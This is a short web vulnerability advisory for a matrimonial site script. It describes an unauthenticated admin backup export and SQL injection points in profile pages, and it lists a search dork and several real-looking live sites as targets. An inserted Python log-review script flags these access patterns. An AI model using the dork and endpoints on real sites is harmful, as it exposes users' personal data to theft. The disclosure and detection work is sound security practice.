========================================================================
| # Title : Matrimonial Script unauthorized Export & Download Backup vulnerability
| # Author : indoushka
| # email : indoushka4ever@gmail.com
| # Tested on : Windows 8.1 French version (Pro)
| # Version : n/a
| # Vendor : http://www.scubez.net/
| # Link : http://www.mscript.in/ * Demo: http://www.mscript.in/matrimonial-demo.html
| # Dork : "printprofile.php?id="
========================================================================
PoC : https://www.youtube.com/watch?v=ZMw-JpgqrvU&feature=youtu.be
Download Backup :
After choosing a target, append the path "admin/excel_report.php" to its base URL:
http://searchmyaddress.biz/matri/admin/excel_report.php
SQL injection :
http://www.akankshamatrimonial.com/printprofile.php?id=MAT13534 => inject here
http://www.lagnamkaroti.com/viewprofile.php?id=MB00011 => inject here
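For operators of an affected install, both issues above leave traces in the web server access log. The Python sketch below is an added example, not part of the original advisory or the vendor's code: it flags successful responses from admin/excel_report.php to addresses outside an admin allowlist, and id values on printprofile.php / viewprofile.php that do not fit a letters-then-digits shape. The log lines, IP addresses, allowlist and id pattern are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format prefix: ip ident user [time] "METHOD target PROTO" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) ')
# Assumption: profile ids are a short letter prefix followed by digits.
ID_RE = re.compile(r'[A-Za-z]{1,5}\d{1,10}')
PROFILE_PAGES = ("/printprofile.php", "/viewprofile.php")
EXPORT_PAGE = "/admin/excel_report.php"
ADMIN_IPS = {"192.0.2.10"}  # hypothetical allowlist of admin workstations

# Constructed sample log lines (documentation address ranges, made-up ids).
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /admin/excel_report.php HTTP/1.1" 200 48213',
    '198.51.100.7 - - [01/Jan/2024:10:05:00 +0000] "GET /admin/excel_report.php HTTP/1.1" 200 48213',
    '198.51.100.7 - - [01/Jan/2024:10:06:00 +0000] "GET /printprofile.php?id=MAT00001 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [01/Jan/2024:10:07:00 +0000] "GET /viewprofile.php?id=MB00002%27 HTTP/1.1" 500 312',
    '203.0.113.5 - - [01/Jan/2024:10:08:00 +0000] "GET /admin/excel_report.php HTTP/1.1" 302 0',
]


def review(lines, admin_ips=ADMIN_IPS):
    """Return (line_no, reason) for each request an analyst should look at."""
    findings = []
    for no, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line we understand
        ip, target, status = m.groups()
        url = urlsplit(target)
        path = url.path.lower()
        if path.endswith(EXPORT_PAGE):
            # A 200 means the export was actually served, not redirected to login.
            if status == "200" and ip not in admin_ips:
                findings.append((no, "export served to non-admin address"))
        elif path.endswith(PROFILE_PAGES):
            # parse_qs percent-decodes, so encoded metacharacters are seen too.
            ids = parse_qs(url.query, keep_blank_values=True).get("id", [])
            if any(not ID_RE.fullmatch(v) for v in ids):
                findings.append((no, "malformed id parameter"))
    return findings


if __name__ == "__main__":
    for no, reason in review(SAMPLE):
        print(f"line {no}: {reason}")
```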
Greetz : ⵏⴻⴽⴽⴰⴰ ⵙⴰⵍⴰⵀ ⴻⴷⴷⵉⵏⴻ------ⵯⵉⵯⴰ ⴰⵎⴰⵣⵉⴳⴻⵏ-------- ⵎⴰⵅⵡⴻⵍⵍ ⵛⴰⵛⵀⴷoⵍⵍⴰⵔ ------
jericho * Larry W. Cashdollar * moncet-1 * Shadow00715 * Ihsan Sencan
===================== pⴰⵛⴽⴻⵜ ⵙⵜoⵔⵎ ⵙⴻⵛⵓⵔⵉⵜⵢ ===============================